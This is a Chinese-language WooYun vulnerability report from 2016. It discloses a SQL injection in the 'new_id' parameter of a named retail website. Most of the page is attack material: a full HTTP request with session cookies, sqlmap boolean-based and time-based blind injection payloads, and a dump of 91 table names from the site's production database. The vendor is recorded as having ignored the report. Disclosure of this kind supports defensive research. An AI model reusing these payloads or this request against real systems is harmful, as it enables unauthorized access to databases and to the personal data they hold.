当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170720

漏洞标题:红星美凯龙某处SQL注入漏洞

相关厂商:mmall.com

漏洞作者: 路人甲

提交时间:2016-01-18 10:17

修复时间:2016-01-23 10:20

公开时间:2016-01-23 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /zhuangxiu/article-23186.html?act=getcomments&con=news HTTP/1.1
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.mmall.com
Cookie: BIGipServerwww_proxy_pool=2298609674.37151.0000; SESSION_ID=082eDHdx3IuAtLw42g%2B9dmN%2Fk8PISjX%2BIygXvlL24PvsLntcptBkjxeIRo8wBgAuZtwd%2BeQqPh7k0FaISQ; BIGipServerzhuangxiu_pool=2080505866.20480.0000; BIGipServeractivity_pool=1694564362.20480.0000; citys_province=730flRSN%2BsxZyTg18J9o6NlW3WhNqq%2FlzST3YBtgnw; citys_city=d00aq5W0gIXcIS96QbtMwxHRg2nCtibWv%2FeUe3PnGuEHLUAW0V%2FPFHJv; company_key=d87dMtcJdmryMzwPH58qAM8XKoECw%2Fhsjip%2BO560JQ; search_uuid=a350ikRg5IgC3xagG3g9NFFaGqylPrdCxlvhK0r8t1yKnUMCcBjozS2PYrW2OBRjVwvOX%2Bd%2B2wCoMo%2FIIbZhTBq10w; mmallcityid=c680daH5X%2Baf55RAIyUCuPeutkWNJkUgOC2i%2FWgp; session_word=1eddnvFPhGzc5fE9jrMcqUyyaWQDyQKENBlYwRhqIKM%2B; PHPSESSID=70e0elfqhfdqeuiejuhrnfc784; referer_domain=www.acunetix-referrer.com; OZ_1U_1727=vid=v69b6f1fa7a5f3.0&ctime=1453033501&ltime=1453033419; OZ_1Y_1727=erefer=http%3A//www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//www.mmall.com/zhuangxiu/journal.html&etime=1453033501&ctime=1453033419&ltime=1453033328&compid=1727; obj=; mask=; items=; show=; OZ_0a_1727=__AD_DT-1*1453028381*http%3A//www.mmall.com/goods-3983.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028615*http%3A//www.mmall.com/goods-35629.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028851*http%3A//www.mmall.com/goods-48678.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453032970*http%3A//www.mmall.com/zhuangxiu/tu/list-1122.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453033391*http%3A//www.mmall.com/zhuangxiu/tu/list-1074.html%3Fimg_id%3D18206*http%3A//www.mmall.com/activity/201601pandian.html; function 404=function 404; undefined=undefined; HMACCOUNT=D08EA30393110F77; _gscu_917286130=53027685yzkw4y93; _gscs_917286130=53027685k8rhxa93|pv:1; _gscbrs_917286130=1; Hm_lvt_96e2e95eba41bc1ff5d5ebd2e03566c5=1453027655,1453027686,1453027778,1453028004; Hm_lpvt_96e2e95eba41bc1ff5d5ebd2e03566c5=1453028004; Hm_lvt_0bead37082ff97315d9a4fac8c4fa344=1453027777,1453028004,1453032788,1453034544; Hm_lpvt_0bead37082ff97315d9a4fac8c4fa344=1453034544; CNZZDATA1256749325=1805230194-1453026322-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1453026322; bdshare_firstime=1453028470945; Hm_lvt_ffbfb19e2a0ddb32c980773d2e851554=1453027842,1453027964,1453028164,1453028490; Hm_lpvt_ffbfb19e2a0ddb32c980773d2e851554=1453028490; v="2016011719170400058512700142934871|clipboard:email:bsharesync"; opxPID=2016011719170400058512700142934871; u=1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|; JSESSIONID=9D4CFC0079851412A21A6F4989B64ED4.server99
Host: www.mmall.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
new_id=23186&page=2

1111.png

1.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: new_id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: new_id=(SELECT (CASE WHEN (7054=7054) THEN 7054 ELSE 7054*(SELECT 7054 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&page=2
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: new_id=23186 AND (SELECT * FROM (SELECT(SLEEP(5)))WYcA)&page=2
---
back-end DBMS: MySQL >= 5.0.0
Database: mmall_info_new
[91 tables]
+----------------------------------------+
| mall_assets |
| mall_associations |
| mall_banner_clients |
| mall_banner_tracks |
| mall_banners |
| mall_categories |
| mall_comment |
| mall_contact_details |
| mall_content |
| mall_content_frontpage |
| mall_content_keyword |
| mall_content_rating |
| mall_core_log_searches |
| mall_extensions |
| mall_finder_filters |
| mall_finder_links |
| mall_finder_links_terms0 |
| mall_finder_links_terms1 |
| mall_finder_links_terms2 |
| mall_finder_links_terms3 |
| mall_finder_links_terms4 |
| mall_finder_links_terms5 |
| mall_finder_links_terms6 |
| mall_finder_links_terms7 |
| mall_finder_links_terms8 |
| mall_finder_links_terms9 |
| mall_finder_links_termsa |
| mall_finder_links_termsb |
| mall_finder_links_termsc |
| mall_finder_links_termsd |
| mall_finder_links_termse |
| mall_finder_links_termsf |
| mall_finder_taxonomy |
| mall_finder_taxonomy_map |
| mall_finder_terms |
| mall_finder_terms_common |
| mall_finder_tokens |
| mall_finder_tokens_aggregate |
| mall_finder_types |
| mall_gather |
| mall_gather_img |
| mall_keyword |
| mall_keyword_cat |
| mall_keyword_tdk |
| mall_languages |
| mall_menu |
| mall_menu_types |
| mall_messages |
| mall_messages_cfg |
| mall_modules |
| mall_modules_menu |
| mall_newsfeeds |
| mall_overrider |
| mall_phocagallery |
| mall_phocagallery_categories |
| mall_phocagallery_comments |
| mall_phocagallery_designers |
| mall_phocagallery_fb_users |
| mall_phocagallery_homes |
| mall_phocagallery_img_comments |
| mall_phocagallery_img_votes |
| mall_phocagallery_img_votes_statistics |
| mall_phocagallery_products |
| mall_phocagallery_tags |
| mall_phocagallery_tags_articles_ref |
| mall_phocagallery_tags_articles_view |
| mall_phocagallery_tags_img_view |
| mall_phocagallery_tags_products_ref |
| mall_phocagallery_tags_products_view |
| mall_phocagallery_tags_ref |
| mall_phocagallery_tags_upload_img_view |
| mall_phocagallery_upload |
| mall_phocagallery_upload_tags_ref |
| mall_phocagallery_user |
| mall_phocagallery_votes |
| mall_phocagallery_votes_statistics |
| mall_redirect_links |
| mall_schemas |
| mall_session |
| mall_template_styles |
| mall_update_categories |
| mall_update_sites |
| mall_update_sites_extensions |
| mall_updates |
| mall_user_notes |
| mall_user_profiles |
| mall_user_usergroup_map |
| mall_usergroups |
| mall_users |
| mall_viewlevels |
| mall_weblinks |
+----------------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-23 10:20

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价